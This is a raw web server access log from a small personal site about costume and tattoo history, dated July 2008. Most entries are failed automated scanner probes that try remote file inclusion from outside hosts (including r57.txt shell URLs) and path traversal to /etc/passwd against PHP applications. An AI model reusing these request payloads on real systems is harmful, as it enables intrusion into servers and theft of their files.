83.103.23.40 - - [12/Jul/2008:23:24:14 -0500] "GET //Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:23:24:14 -0500] "GET //Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
119.95.28.253 - - [12/Jul/2008:23:24:26 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
119.95.28.253 - - [12/Jul/2008:23:24:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
119.95.28.253 - - [12/Jul/2008:23:24:29 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
119.95.28.253 - - [12/Jul/2008:23:24:30 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
119.95.28.253 - - [12/Jul/2008:23:24:32 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
119.95.28.253 - - [12/Jul/2008:23:24:33 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15;MEGAUPLOAD 1.0"
72.47.205.18 - - [12/Jul/2008:23:24:39 -0500] "GET /logs/access_log.1207785600//header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
72.47.205.18 - - [12/Jul/2008:23:24:39 -0500] "GET //header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
72.47.205.18 - - [12/Jul/2008:23:24:39 -0500] "GET /logs//header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
74.6.18.252 - - [12/Jul/2008:23:25:57 -0500] "GET /logs/access_log.1204588800 HTTP/1.0" 200 242154 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.254.214.2 - - [12/Jul/2008:23:27:51 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
213.254.214.2 - - [12/Jul/2008:23:27:52 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
89.218.85.18 - - [12/Jul/2008:23:28:18 -0500] "GET /logs/send_reminders.php?includedir=http://?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [12/Jul/2008:23:28:18 -0500] "GET /send_reminders.php?includedir=http://?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.151.102.50 - - [12/Jul/2008:23:29:21 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
193.233.85.46 - - [12/Jul/2008:23:31:30 -0500] "GET /logs/access_log.1207785600//header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
193.233.85.46 - - [12/Jul/2008:23:31:31 -0500] "GET //header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.233.85.46 - - [12/Jul/2008:23:31:31 -0500] "GET /logs//header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.36.235.202 - - [12/Jul/2008:23:31:34 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//administrator/components/com_babackup/backups/idpepez2.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
72.36.235.202 - - [12/Jul/2008:23:31:34 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//administrator/components/com_babackup/backups/idpepez2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
68.144.87.82 - - [12/Jul/2008:23:39:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
198.88.236.235 - - [12/Jul/2008:23:41:50 -0500] "GET /logs/access_log.1194048000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
198.88.236.235 - - [12/Jul/2008:23:41:51 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
198.88.236.235 - - [12/Jul/2008:23:41:51 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
87.106.219.212 - - [12/Jul/2008:23:42:23 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.106.219.212 - - [12/Jul/2008:23:42:23 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.106.91.139 - - [12/Jul/2008:23:42:47 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.91.139 - - [12/Jul/2008:23:42:48 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.47.205.18 - - [12/Jul/2008:23:47:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
72.47.205.18 - - [12/Jul/2008:23:47:19 -0500] "GET //skin/zero_vote/error.php?dir=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
217.20.163.130 - - [12/Jul/2008:23:47:33 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cafelecaire.com/gallery/data/blid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
217.20.163.130 - - [12/Jul/2008:23:47:33 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.cafelecaire.com/gallery/data/blid.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
217.20.163.130 - - [12/Jul/2008:23:47:33 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cafelecaire.com/gallery/data/blid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
217.20.163.130 - - [12/Jul/2008:23:47:34 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.cafelecaire.com/gallery/data/blid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
210.245.87.117 - - [12/Jul/2008:23:49:00 -0500] "GET /logs/access_log.1207785600/Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
210.245.87.117 - - [12/Jul/2008:23:49:01 -0500] "GET /Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
210.245.87.117 - - [12/Jul/2008:23:49:01 -0500] "GET /logs/Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.85.48.194 - - [12/Jul/2008:23:49:01 -0500] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.37.237.58 - - [12/Jul/2008:23:49:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
72.37.237.58 - - [12/Jul/2008:23:49:18 -0500] "GET //skin/zero_vote/error.php?dir=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
87.106.219.212 - - [12/Jul/2008:23:50:03 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.219.212 - - [12/Jul/2008:23:50:04 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
78.111.68.37 - - [12/Jul/2008:23:51:55 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
78.111.68.37 - - [12/Jul/2008:23:51:56 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
212.34.140.215 - - [12/Jul/2008:23:53:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jul/2008:23:53:04 -0500] "GET //skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.106.18.76 - - [12/Jul/2008:23:54:34 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:23:54:39 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:23:54:39 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:23:54:45 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.91.139 - - [12/Jul/2008:23:56:01 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.91.139 - - [12/Jul/2008:23:56:02 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.201.40.66 - - [12/Jul/2008:23:56:46 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.201.40.66 - - [12/Jul/2008:23:56:46 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jul/2008:23:57:50 -0500] "GET /logs/send_reminders.php?includedir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jul/2008:23:57:55 -0500] "GET /send_reminders.php?includedir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
122.57.206.170 - - [12/Jul/2008:23:58:45 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.co.nz/search?hl=en&q=Court+Dress+of+Knights+of+the+Garter&btnG=Google+Search&meta=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
87.106.91.139 - - [12/Jul/2008:23:58:53 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.106.91.139 - - [12/Jul/2008:23:58:53 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
122.57.206.170 - - [12/Jul/2008:23:59:35 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 2921 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:36 -0500] "GET /costume/costume49%20copy.JPG HTTP/1.1" 200 16898 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:37 -0500] "GET /costume/costm50.jpg HTTP/1.1" 200 53503 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:37 -0500] "GET /costume/costume51%20copy.JPG HTTP/1.1" 200 16648 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:38 -0500] "GET /costume/costume52%20copy.JPG HTTP/1.1" 200 16497 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:38 -0500] "GET /costume/costume53%20copy.JPG HTTP/1.1" 200 16962 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:38 -0500] "GET /costume/costume54%20copy.JPG HTTP/1.1" 200 16716 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:39 -0500] "GET /costume/costume55%20copy.JPG HTTP/1.1" 200 16737 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:40 -0500] "GET /costume/costume56%20copy.JPG HTTP/1.1" 200 16276 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:41 -0500] "GET /costume/costume57%20copy.JPG HTTP/1.1" 200 16878 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:42 -0500] "GET /costume/costume58%20copy.JPG HTTP/1.1" 200 16381 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:42 -0500] "GET /costume/costume59%20copy.JPG HTTP/1.1" 200 15800 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
122.57.206.170 - - [12/Jul/2008:23:59:43 -0500] "GET /costume/costume60.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
200.30.74.19 - - [13/Jul/2008:00:01:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.30.74.19 - - [13/Jul/2008:00:01:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
200.30.74.19 - - [13/Jul/2008:00:01:32 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
211.20.85.150 - - [13/Jul/2008:00:01:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
200.30.74.19 - - [13/Jul/2008:00:01:32 -0500] "GET //skin/zero_vote/error.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
211.239.161.224 - - [13/Jul/2008:00:02:42 -0500] "GET /logs/access_log.1194048000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 362 "-""libwww-perl/5.79"
211.239.161.224 - - [13/Jul/2008:00:02:44 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
211.239.161.224 - - [13/Jul/2008:00:02:44 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
194.79.75.195 - - [13/Jul/2008:00:03:23 -0500] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
203.157.185.8 - - [13/Jul/2008:00:03:55 -0500] "GET /logs/errors.php?error=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.0" 404 287 "-""libwww-perl/5.805"
203.157.185.8 - - [13/Jul/2008:00:03:57 -0500] "GET /errors.php?error=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.0" 404 282 "-""libwww-perl/5.805"
77.221.130.16 - - [13/Jul/2008:00:03:58 -0500] "GET /logs/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
77.221.130.16 - - [13/Jul/2008:00:03:58 -0500] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.106.91.139 - - [13/Jul/2008:00:05:28 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.91.139 - - [13/Jul/2008:00:05:28 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.9.63.18 - - [13/Jul/2008:00:07:42 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 343 "-""libwww-perl/5.811"
81.9.63.18 - - [13/Jul/2008:00:07:42 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.811"
89.218.85.18 - - [13/Jul/2008:00:09:00 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://geocities.com/jempiak/header.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.218.85.18 - - [13/Jul/2008:00:09:00 -0500] "GET //include/admin.lib.inc.php?site_path=http://geocities.com/jempiak/header.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
209.8.22.226 - - [13/Jul/2008:00:14:18 -0500] "GET /logs/access_log.1212278400? HTTP/1.0" 200 536695 "-""-"
87.106.91.139 - - [13/Jul/2008:00:20:00 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.106.91.139 - - [13/Jul/2008:00:20:00 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://sujianto.com/load.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.55.208.120 - - [13/Jul/2008:00:22:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [13/Jul/2008:00:22:13 -0500] "GET /logs/access_log.1171756800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [13/Jul/2008:00:22:13 -0500] "GET /logs/access_log.1154563200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [13/Jul/2008:00:22:13 -0500] "GET /logs/access_log.1160352000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.75.225.10 - - [13/Jul/2008:00:29:48 -0500] "GET /logs/db.php?path_local=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
208.75.225.10 - - [13/Jul/2008:00:29:48 -0500] "GET /db.php?path_local=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 290 "-""libwww-perl/5.811"
65.55.208.119 - - [13/Jul/2008:00:32:55 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.18.182.194 - - [13/Jul/2008:00:33:09 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
67.18.182.194 - - [13/Jul/2008:00:33:09 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
74.6.18.252 - - [13/Jul/2008:00:36:00 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.226.199.84 - - [13/Jul/2008:00:37:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:47 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:48 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:58 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:37:59 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:01 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:02 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:05 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:10 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:12 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:14 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:19 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:21 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
